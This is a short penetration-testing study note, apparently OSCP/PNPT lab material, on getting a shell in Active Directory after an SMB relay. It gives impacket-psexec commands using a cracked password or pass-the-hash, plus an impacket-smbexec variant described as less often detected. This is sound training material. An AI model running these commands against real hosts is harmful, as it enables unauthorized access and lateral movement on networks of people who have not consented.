// notes/ Active Directory
🏛️

Initial Attack Strategy Shell Acess

If we're able to dump the SAM in the SMB Relay attack then we can use those hashes to pop a shell on a machine. 

#active directory#adot8
source · oscp.adot8.com · active-directory/initial-attack-strategy_shell-acess

Shell Acess

Gaining Shell Access Overview

If we're able to dump the SAM in the SMB Relay attack then we can use those hashes to pop a shell on a machine.

We can use the actual password of the user if we cracked it or we can pass the hash instead.

Impacket-psexec

sh
$impacket-psexec PNPT/pparker:'Password2'@192.168.1.128
$
$impacket-psexec administrator@192.168.1.128 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f

{% hint style="info" %} Impacket-wmiexec and Impacket-smbexec are also options that work the same way.

Impacket-smbexec gets picked up much less than the others

bash
$impacket-smbexec administrator@192.168.1.128 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f

{% endhint %}